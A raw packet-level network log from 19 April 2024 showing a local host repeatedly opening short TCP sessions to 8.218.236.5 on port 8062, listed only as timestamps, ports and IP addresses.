Apr 19, 2024 09:50:01.709213972 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709232092 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709234953 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709249020 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709265947 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709281921 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709285975 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709299088 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709310055 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709316969 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709333897 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709338903 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709350109 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709359884 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709367037 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709383011 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709392071 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709398985 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709415913 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709431887 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709434986 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709448099 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709455013 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709465981 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709481955 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709486961 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709500074 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709515095 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709521055 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709532022 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709547997 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709563971 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709570885 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709582090 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709592104 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709598064 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709618092 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709626913 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709636927 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:01.709647894 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:01.709686041 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.031924009 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.031992912 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.032033920 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.032053947 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.032073021 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.032146931 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.032147884 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.032146931 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.032146931 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.032192945 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.032208920 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.032253981 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033158064 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033195972 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033235073 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033240080 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033277035 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033287048 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033315897 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033323050 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033354044 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033360958 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033379078 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033395052 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033417940 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033432007 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033457041 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033471107 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033489943 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033509016 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033526897 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033549070 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033570051 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033586979 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033607006 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033623934 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033642054 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033662081 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033682108 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033699989 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033719063 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033739090 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033756018 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033776045 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033790112 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033813000 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033832073 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033850908 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033878088 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033891916 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.033904076 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.033955097 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.038372040 CEST	49732	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.046824932 CEST	49733	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.362261057 CEST	8062	49732	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.368756056 CEST	8062	49733	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.368901968 CEST	49733	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.369143963 CEST	49733	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.691131115 CEST	8062	49733	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.692931890 CEST	8062	49733	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.692977905 CEST	8062	49733	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:02.693041086 CEST	49733	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.693134069 CEST	49733	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.693239927 CEST	49733	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:02.800189018 CEST	49734	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:03.015125036 CEST	8062	49733	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:03.124411106 CEST	8062	49734	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:03.124547005 CEST	49734	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:03.124784946 CEST	49734	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:03.448553085 CEST	8062	49734	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:03.450352907 CEST	8062	49734	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:03.450373888 CEST	8062	49734	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:03.450459003 CEST	49734	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:03.450459003 CEST	49734	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:03.457628965 CEST	49734	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:03.565056086 CEST	49735	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:03.781446934 CEST	8062	49734	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:03.904658079 CEST	8062	49735	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:03.904933929 CEST	49735	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:03.905308008 CEST	49735	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:04.244535923 CEST	8062	49735	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:04.247220039 CEST	8062	49735	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:04.247262001 CEST	8062	49735	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:04.247359037 CEST	49735	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:04.247467041 CEST	49735	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:04.247467041 CEST	49735	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:04.367409945 CEST	49736	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:04.586976051 CEST	8062	49735	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:04.689343929 CEST	8062	49736	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:04.689471960 CEST	49736	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:04.689816952 CEST	49736	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.011367083 CEST	8062	49736	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:05.013215065 CEST	8062	49736	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:05.013257027 CEST	8062	49736	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:05.013374090 CEST	49736	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.013544083 CEST	49736	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.013544083 CEST	49736	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.127239943 CEST	49737	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.335345030 CEST	8062	49736	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:05.453715086 CEST	8062	49737	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:05.453980923 CEST	49737	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.454150915 CEST	49737	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.780368090 CEST	8062	49737	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:05.782332897 CEST	8062	49737	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:05.782402992 CEST	8062	49737	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:05.782432079 CEST	49737	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.782464981 CEST	49737	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.782601118 CEST	49737	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:05.892442942 CEST	49738	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:06.108455896 CEST	8062	49737	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:06.241981030 CEST	8062	49738	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:06.242228985 CEST	49738	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:06.242471933 CEST	49738	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:06.592236996 CEST	8062	49738	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:06.593633890 CEST	8062	49738	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:06.593657017 CEST	8062	49738	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:06.593815088 CEST	49738	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:06.593815088 CEST	49738	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:06.593874931 CEST	49738	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:06.725109100 CEST	49739	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:06.943309069 CEST	8062	49738	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:07.038249969 CEST	8062	49739	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:07.038366079 CEST	49739	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:07.038625956 CEST	49739	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:07.352288961 CEST	8062	49739	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:07.352713108 CEST	8062	49739	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:07.352787971 CEST	8062	49739	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:07.352828026 CEST	49739	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:07.352864981 CEST	49739	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:07.353019953 CEST	49739	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:07.480376959 CEST	49740	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:07.665091991 CEST	8062	49739	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:07.802826881 CEST	8062	49740	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:07.802983046 CEST	49740	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:07.803215027 CEST	49740	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.125444889 CEST	8062	49740	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:08.127300024 CEST	8062	49740	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:08.127341032 CEST	8062	49740	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:08.127399921 CEST	49740	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.127454996 CEST	49740	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.127505064 CEST	49740	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.236776114 CEST	49741	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.449719906 CEST	8062	49740	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:08.554373026 CEST	8062	49741	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:08.554519892 CEST	49741	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.554764032 CEST	49741	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.874692917 CEST	8062	49741	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:08.876497984 CEST	8062	49741	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:08.876523972 CEST	8062	49741	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:08.876579046 CEST	49741	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.876643896 CEST	49741	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.876696110 CEST	49741	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:08.986299992 CEST	49742	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:09.194237947 CEST	8062	49741	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:09.321239948 CEST	8062	49742	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:09.321374893 CEST	49742	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:09.321549892 CEST	49742	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:09.656336069 CEST	8062	49742	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:09.658212900 CEST	8062	49742	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:09.658233881 CEST	8062	49742	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:09.658294916 CEST	49742	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:09.658334970 CEST	49742	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:09.658416986 CEST	49742	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:09.767297983 CEST	49743	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:09.993244886 CEST	8062	49742	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:10.085798025 CEST	8062	49743	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:10.085905075 CEST	49743	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:10.086076021 CEST	49743	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:10.404536009 CEST	8062	49743	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:10.406213045 CEST	8062	49743	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:10.406255007 CEST	8062	49743	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:10.406291008 CEST	49743	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:10.406341076 CEST	49743	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:10.406440973 CEST	49743	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:10.517380953 CEST	49744	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:10.724937916 CEST	8062	49743	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:10.831538916 CEST	8062	49744	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:10.831680059 CEST	49744	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:10.831896067 CEST	49744	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:11.145648956 CEST	8062	49744	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:11.147425890 CEST	8062	49744	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:11.147475958 CEST	8062	49744	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:11.147547960 CEST	49744	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:11.147548914 CEST	49744	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:11.147629976 CEST	49744	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:11.263997078 CEST	49745	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:11.461668015 CEST	8062	49744	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:11.582359076 CEST	8062	49745	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:11.582453966 CEST	49745	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:11.588819981 CEST	49745	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:11.906634092 CEST	8062	49745	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:11.908493042 CEST	8062	49745	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:11.908523083 CEST	8062	49745	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:11.908653975 CEST	49745	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:11.908756971 CEST	49745	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:12.017333031 CEST	49746	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:12.226583004 CEST	8062	49745	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:12.335508108 CEST	8062	49746	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:12.335625887 CEST	49746	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:12.336126089 CEST	49746	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:12.654897928 CEST	8062	49746	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:12.656878948 CEST	8062	49746	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:12.656898975 CEST	8062	49746	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:12.656946898 CEST	49746	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:12.656976938 CEST	49746	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:12.657114983 CEST	49746	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:12.765266895 CEST	49747	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:12.976385117 CEST	8062	49746	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:13.093027115 CEST	8062	49747	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:13.093144894 CEST	49747	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:13.136814117 CEST	49747	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:13.464628935 CEST	8062	49747	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:13.466619015 CEST	8062	49747	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:13.466650963 CEST	8062	49747	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:13.466803074 CEST	49747	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:13.466803074 CEST	49747	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:13.466856956 CEST	49747	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:13.581792116 CEST	49748	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:13.794514894 CEST	8062	49747	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:13.900302887 CEST	8062	49748	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:13.900499105 CEST	49748	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:14.354243994 CEST	49748	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:14.672979116 CEST	8062	49748	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:14.674835920 CEST	8062	49748	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:14.674876928 CEST	8062	49748	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:14.674916983 CEST	49748	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:14.674973965 CEST	49748	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:14.788439035 CEST	49748	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:14.892520905 CEST	49749	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:15.107032061 CEST	8062	49748	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:15.220033884 CEST	8062	49749	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:15.220175028 CEST	49749	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:15.220338106 CEST	49749	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:15.549695015 CEST	8062	49749	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:15.551445961 CEST	8062	49749	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:15.551461935 CEST	8062	49749	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:15.551506996 CEST	49749	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:15.551589966 CEST	49749	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:15.551665068 CEST	49749	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:15.658504009 CEST	49750	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:15.879179001 CEST	8062	49749	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:15.997746944 CEST	8062	49750	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:15.997842073 CEST	49750	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:15.998085976 CEST	49750	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:16.337999105 CEST	8062	49750	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:16.339648962 CEST	8062	49750	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:16.339690924 CEST	8062	49750	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:16.339884043 CEST	49750	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:16.339884043 CEST	49750	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:16.341713905 CEST	49750	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:16.455208063 CEST	49751	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:16.682277918 CEST	8062	49750	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:16.792399883 CEST	8062	49751	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:16.792654037 CEST	49751	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:16.792742014 CEST	49751	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:17.129833937 CEST	8062	49751	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:17.131575108 CEST	8062	49751	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:17.131616116 CEST	8062	49751	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:17.131762028 CEST	49751	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:17.134479046 CEST	49751	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:17.246011972 CEST	49754	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:17.471391916 CEST	8062	49751	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:17.561739922 CEST	8062	49754	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:17.561860085 CEST	49754	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:17.562277079 CEST	49754	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:17.875349045 CEST	8062	49754	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:17.877268076 CEST	8062	49754	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:17.877286911 CEST	8062	49754	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:17.877340078 CEST	49754	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:17.877371073 CEST	49754	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:17.877485037 CEST	49754	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:17.985354900 CEST	49756	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:18.190587997 CEST	8062	49754	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:18.300157070 CEST	8062	49756	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:18.300278902 CEST	49756	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:18.300569057 CEST	49756	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:18.615448952 CEST	8062	49756	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:18.617100000 CEST	8062	49756	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:18.617142916 CEST	8062	49756	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:18.617194891 CEST	49756	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:18.617194891 CEST	49756	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:18.617367983 CEST	49756	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:18.723438978 CEST	49759	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:50:18.932451010 CEST	8062	49756	8.218.236.5	192.168.2.4
Apr 19, 2024 09:50:19.045069933 CEST	8062	49759	8.218.236.5	192.168.2.4
